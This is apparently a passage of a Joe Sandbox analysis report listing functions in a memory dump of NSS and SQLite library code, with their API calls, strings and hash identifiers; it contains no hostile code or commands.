Opcode ID: 7a199947758b6ee802323609e6d687380a98c7340936ea921d420658c2e97c7b
Instruction ID: 5af47b9488c326e009b9ec70981153c904fce35831893aba0eb7e7923da86eca
Opcode Fuzzy Hash: 7a199947758b6ee802323609e6d687380a98c7340936ea921d420658c2e97c7b
Instruction Fuzzy Hash: 5791BEB0B042068FDB14CF64CA85A6BB7F2BF85318F144A3DE41697A51EB30F945CB91

Function 6C7DBD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C7DBD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C7DBD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C7DBD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C7DBD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C7DBDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C7DBDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C7DBDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C7DBE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C7DBE1E

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: 8fa920aef11c6cbcfda17ef1ad4af581d4f3abcba4db91f35e4dc14c9a3f37a6
Instruction ID: ccd8f6020cef0c3b5068045599bde76607a0e2e232f3d1bfcab056af0c56329a
Opcode Fuzzy Hash: 8fa920aef11c6cbcfda17ef1ad4af581d4f3abcba4db91f35e4dc14c9a3f37a6
Instruction Fuzzy Hash: 1321D77AE0029A57FB004A579E4BF8F36789B92B4EF0A1034F916EE741E710B418C6A5

Function 6C888D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8D14E4,6C83CC70), ref: 6C888D47
PR_GetCurrentThread.NSS3 ref: 6C888D98

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C888E7B
htons.WSOCK32(?), ref: 6C888EDB
PR_GetCurrentThread.NSS3 ref: 6C888F99
PR_GetCurrentThread.NSS3 ref: 6C88910A

Strings

%u.%u.%u.%u, xrefs: 6C888E74

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 6cc04f0580245b3429808e9a7f95a93604149751f64e58e6fb5c2334f706d40b
Instruction ID: 13eda4025349f22d19ab122632f360c34bbd1fb9b9e543dd0bcd0b3490586bf2
Opcode Fuzzy Hash: 6cc04f0580245b3429808e9a7f95a93604149751f64e58e6fb5c2334f706d40b
Instruction Fuzzy Hash: BB02CA3590B2558FDB34CF19C6A836ABBA3EF42308F198A9AC8914FF91C335D905C790

Function 6C70EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

%s %T already exists, xrefs: 6C70FAC8
temporary table name must be unqualified, xrefs: 6C70F734
not authorized, xrefs: 6C70F957, 6C70F9BA
table, xrefs: 6C70F05C, 6C70FABC, 6C70FAC7
authorizer malfunction, xrefs: 6C70F95C, 6C70F9BF, 6C70FA5E, 6C70FA8B
sqlite_master, xrefs: 6C70F0AB, 6C70F2DA, 6C70F757, 6C70F93E
view, xrefs: 6C70F061, 6C70F071, 6C70FAB7
there is already an index named %s, xrefs: 6C70F9D7
sqlite_temp_master, xrefs: 6C70F0A6, 6C70F2D5

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 76e009ddc640efe95a9da53e3de27944880fe2cf4634eea1bc57d5ff7e35e0f4
Instruction ID: 36cacd06168c5a3ef6da7817552fd7c32e0709e12257e05e4555aed7ca4ad2fa
Opcode Fuzzy Hash: 76e009ddc640efe95a9da53e3de27944880fe2cf4634eea1bc57d5ff7e35e0f4
Instruction Fuzzy Hash: CA72C0B0E042058FDB14CF69C684BAABBF1FF49308F1481ADD8159BB92D775E846CB94

Function 6C829C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6C6FC52B), ref: 6C829D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C82A035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C82A114

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C82A01F, 6C82A0E4, 6C82A0FE
database corruption, xrefs: 6C82A029, 6C82A108
%s at line %d of [%.10s], xrefs: 6C82A02E, 6C82A10D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: 2352b55ed349925374d9e5728581fed758f4e2120bbf2646fffc333ca9d9539b
Instruction ID: bd1543b77988d5dd47eda57ef0561070fca8324c0ce20d8579c9ce526d7a9ce7
Opcode Fuzzy Hash: 2352b55ed349925374d9e5728581fed758f4e2120bbf2646fffc333ca9d9539b
Instruction Fuzzy Hash: A722CE70608345CFC724CF29C29466AB7E1FF8A344F148E2DE8DA97A41D739D885CB82

Function 6C849D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C708637,?,?), ref: 6C849E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C708637), ref: 6C849ED6

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C849EC0
database corruption, xrefs: 6C849ECA
%s at line %d of [%.10s], xrefs: 6C849ECF

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: a60189ac1241a79686a9fd3f2aa70fb4629c8c835c84b34e67067a98e72c3842
Instruction ID: 432af81bc495bd6854c1b2851d1a568ebef58494a8594d261d0891d3b7259b8c
Opcode Fuzzy Hash: a60189ac1241a79686a9fd3f2aa70fb4629c8c835c84b34e67067a98e72c3842
Instruction Fuzzy Hash: 55819271B012198FCB24CFA9CB80EDEB3FAAB49304B148969D915AB741E771ED45CB90

Function 6C857F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8581BC

Strings

BINARY, xrefs: 6C858126
out of memory, xrefs: 6C85835B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memset
String ID: BINARY$out of memory
API String ID: 2221118986-3971123528
Opcode ID: 1eadec2c5a082103e60af6e7acfbded762e69495481df8e59552c922f5186689
Instruction ID: ad8fd85ca104fcd116a312beaf36559a6e75bf118e090403ba9098c27077522e
Opcode Fuzzy Hash: 1eadec2c5a082103e60af6e7acfbded762e69495481df8e59552c922f5186689
Instruction Fuzzy Hash: A652BF71E50218CFDB64CF99C980BAEBBB2FF48308F54856BD815AB751D770A856CB80

Function 6C7D9EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7D9ED6

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C7D9EE4

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7D9F38

Part of subcall function 6C7DD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C7D9F0B), ref: 6C7DD03B
Part of subcall function 6C7DD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C7DD04E
Part of subcall function 6C7DD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C7DD07B
Part of subcall function 6C7DD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C7DD08E
Part of subcall function 6C7DD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7DD09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7D9F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C7D9F59

Part of subcall function 6C7D9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C7D9C5B), ref: 6C7D9D82
Part of subcall function 6C7D9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C7D9C5B), ref: 6C7D9DA9
Part of subcall function 6C7D9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C7D9C5B), ref: 6C7D9DCE
Part of subcall function 6C7D9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C7D9C5B), ref: 6C7D9E43

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: ceb40c58bf0f85275ccaed608fcd4fdb692a343c2bb3737b37c19ba70371a7de
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: 3B112BB5F042025BF7109A659E19B9B73A5AFA535CF160234F80A8BB41FF61F918C292

Function 6C88CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C88D086
PR_Malloc.NSS3(00000001), ref: 6C88D0B9
PR_Free.NSS3(?), ref: 6C88D138

Strings

>, xrefs: 6C88CF5B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 896a363789ded3f1197fe71c9c1d172e37bdf826f34d88746e70514c46a1bf0d
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 50D17F26B4354B4BFB34587C8EA13D9B7938B42374F584B2BD5218BFEAE6198843C351

Function 6C82AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d80669e2d6c93919d21cbe2510f36273f1288ba8d4599a6bde9fa3de6f6bda7
Instruction ID: fb9b44df4fd5ee51168c64683cace25be7ecd3059c00ac6223fe351011d8938a
Opcode Fuzzy Hash: 4d80669e2d6c93919d21cbe2510f36273f1288ba8d4599a6bde9fa3de6f6bda7
Instruction Fuzzy Hash: 9AF1C071E021558BEB34CF28DA557AA77F0BB8A308F15463DC906D7740E778AA95CBC0

Function 6C81DFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C6F5001,?,00000003,00000000), ref: 6C81DFD7
memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C6F5001,?), ref: 6C81E2B7
memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C6F5001,?), ref: 6C81E2DA

Strings

W, xrefs: 6C81E111

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: W
API String ID: 160209724-655174618
Opcode ID: dac5f532b719524c90c91354c3c6b927810122960e2df517b4969862cea51714
Instruction ID: 71857e467a529e1b077b14fa373c629ea0a3b3e75e49108b1613029a77e558ff
Opcode Fuzzy Hash: dac5f532b719524c90c91354c3c6b927810122960e2df517b4969862cea51714
Instruction Fuzzy Hash: 66C12831B0D2978FDB24CE2985946AA77F2BF86318F284979DCA99BF41D3319901C7D0

Function 6C7E0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C7E1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C7E1086

Strings

h(~l, xrefs: 6C7E1062, 6C7E105D, 6C7E0F37, 6C7E1081, 6C7E1082
h(~l, xrefs: 6C7E0E55, 6C7E0EC4, 6C7E0F3A, 6C7E0FA7

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(~l$h(~l
API String ID: 1297977491-3782546141
Opcode ID: 8810c631849fd125c2f3e8650083e65db5083992d23e313ea42d9acc8c83f728
Instruction ID: 39f3364e6b4d4d6130b8c76b1be44e8ce54757e8364e44ef870a9cec64ae9336
Opcode Fuzzy Hash: 8810c631849fd125c2f3e8650083e65db5083992d23e313ea42d9acc8c83f728
Instruction Fuzzy Hash: F5A13D72B0125A9FDB08CF99C994AEEB7B6BF8C314B148139E915A7701DB35EC11CB90

Function 6C706F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

unordered*, xrefs: 6C70702B
noskipscan*, xrefs: 6C707067
*?[, xrefs: 6C707034, 6C707052, 6C707070
sz=[0-9]*, xrefs: 6C707049

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: bf146ed8872dc92a3ac4071ffb9920fcd4b9e184cdf519d57f1b341e6e87e5e8
Instruction ID: 0805549e97300d8daf0e0a06d05caf3e1aa3fa30fc0a9731ab087312363ee06f
Opcode Fuzzy Hash: bf146ed8872dc92a3ac4071ffb9920fcd4b9e184cdf519d57f1b341e6e87e5e8
Instruction Fuzzy Hash: 8B718BF2F002154BEB248A6CCA9039E73E29F81354F294339CD69ABBD3D6719D4687D1

Function 6C723EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

sqlite_, xrefs: 6C723FAA, 6C724185
sqlite_master, xrefs: 6C72463F
sqlite_temp_master, xrefs: 6C72460F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: sqlite_$sqlite_master$sqlite_temp_master
API String ID: 0-4221611869
Opcode ID: 5b15d4d0fea17be3c027d4ec42cc2eee1eef2935b8614e84a75bf3149c44227b
Instruction ID: b32135bd67019992d812658e550d658419555f30d3d03c91c220fd114bf12efb
Opcode Fuzzy Hash: 5b15d4d0fea17be3c027d4ec42cc2eee1eef2935b8614e84a75bf3149c44227b
Instruction Fuzzy Hash: 08225C317491954FEB248B6A82605B67BF2AF47318B7845B8C9E15FE43C22DE845E780

Function 6C85BE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON

Download Yara Rule

Strings

`, xrefs: 6C85C0B6

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 0c1a92fa849b64a04df5c806c0e61485e15672f565bbdbe4d66a4d2712784224
Instruction ID: 5e0af6c5ebbf03f2bcd1d5bbf6d14587f5819f9e2613de2062666df541094fbd
Opcode Fuzzy Hash: 0c1a92fa849b64a04df5c806c0e61485e15672f565bbdbe4d66a4d2712784224
Instruction Fuzzy Hash: D0929074A002098FDB65DF58CA80BAEB7B2FF48308F684568D411ABB92D7B5EC55CF50

Function 6C6F3D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6C6F3EA9

Strings

0, xrefs: 6C6F3DAB

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
